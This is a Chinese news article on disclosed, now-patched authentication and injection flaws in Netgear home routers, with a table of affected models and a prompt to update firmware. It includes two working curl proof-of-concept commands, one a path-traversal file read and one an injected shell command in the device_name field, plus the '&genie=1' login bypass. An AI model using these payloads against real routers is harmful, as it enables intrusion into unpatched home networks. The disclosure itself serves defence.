网件系列家用路由器安全认证漏洞的全部细节现已公开
去年国外安全公司蜘蛛实验室的研究人员在经过长期研究后发现网件系列家用路由器存在高危安全认证漏洞。
攻击者并不需要任何高明的技术即可利用漏洞展开攻击,网件已经在去年修复这些漏洞所以现在细节被公开。
写在前面:
由于漏洞本身已经被网件修复而且也过去较长时间,所以研究人员现在正式披露这些漏洞的全部细节和工具。
如果你使用网件路由请直接拉到本文结尾看看是否受影响,若影响的话请及时安装已经修复漏洞的新版固件。
漏洞细节公开后势必有黑客会利用这些漏洞攻击还未修复的设备,因此请务必及时在路由内检查安装新固件。
TWSL2018-002:读取任意文件和密码恢复
该漏洞允许攻击者从设备中读取任意存储的文件,利用前提是路由固件中保存的 Readme.txt 文件未被删除。
curl -d "id=304966648&next_file=cgi-bin/../../tmp/mnt/usb0/part1/README.txt" http://192.168.1.1/genie_restoring.cgi?id=304966648
TWSL2018-003:在进行身份验证后进行注入
该漏洞利用的前提是已经获得管理账号密码并成功登陆,攻击者可利用该漏洞以Root权限执行其他危险命令。
漏洞发生的原因在于网件路由固件并未严格校验URL参数, 让攻击者添加的自定义参数通过 WebShell 执行。
curl -d "action=Apply&device_name=A%22+%26%26+touch+%2Ftmp%2Fjimmers+%26%26+echo+%22B&sysLANIPAddr1=192&sysLANIPAddr2=168&sysLANIPAddr3=1&sysLANIPAddr4=1&sysLANSubnetMask1=255&sysLANSubnetMask2=255&sysLANSubnetMask3=255&sysLANSubnetMask4=0&rip_direction=1&sysRIPVersion=Disabled&dhcp_server=dhcp_server&sysPoolStartingAddr4=2&sysPoolFinishAddr4=254&select=-1&arp_enable=disable&ipmac_token=0&dev_name=R8500mge&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&rip_enable=0&rip_multicast=1" http://192.168.1.1/lan.cgi?id=988337b27ba1f3cdc280e454860f8b10d84e42da
TWSL2018-003:直接跳过账号密码验证环节
该漏洞就是文章开头提到的不需要任何高明技术即可利用的漏洞,并且这个漏洞影响超过17款网件家用路由。
漏洞的利用过程很简单:只需要在登录界面的URL地址后面加上参数&genie=1 即可绕过直接登录绕过验证。
TWSL2018-003:绕过身份认证获取Root权限
该漏洞主要是网件固件存在的跨站请求伪造漏洞( CSRF,Cross-site Request Forgery )引起的安全问题。
利用该漏洞攻击者可以直接以 Root 权限执行任意命令,同时攻击者不需要登录、这个环节本身已绕过验证。
TWSL2018-003:开启WPS功能后获取Root权限
该漏洞允许攻击者在用户开启WPS功能时以 Root 权限执行任意命令,不过该漏洞利用起来相对来说有点难。
想利用该漏洞的话攻击者必须在用户开启WPS功能后的短时间内操作,未开启或早已开启的话则无法被利用。
受影响的型号及其预装固件版本 | |||
受影响的型号 | 预装固件版本 | 受影响的型号 | 预装固件版本 |
D6220 | 1.0.0.0.26 | R7000 | 1.0.9.4 |
D6400 | 1.0.0.60 | R7000P | 1.0.0.56 |
D8500 | 1.0.3.29 | R7100LG | 1.0.0.32 |
R6250 | 1.0.4.12 | R7300DST | 1.0.0.54 |
R6400 | 1.01.24 | R7900 | 1.0.1.18 |
R6400v2 | 1.0.2.30 | R8000 | 1.0.3.44 |
R6700/6900 | 1.0.1.22 | R8300 | 1.0.2.100_1.0.82 |
R6900P | 1.0.0.56 | R8500 | 1.0.2.100_1.0.82 |
*蓝点网 制表 |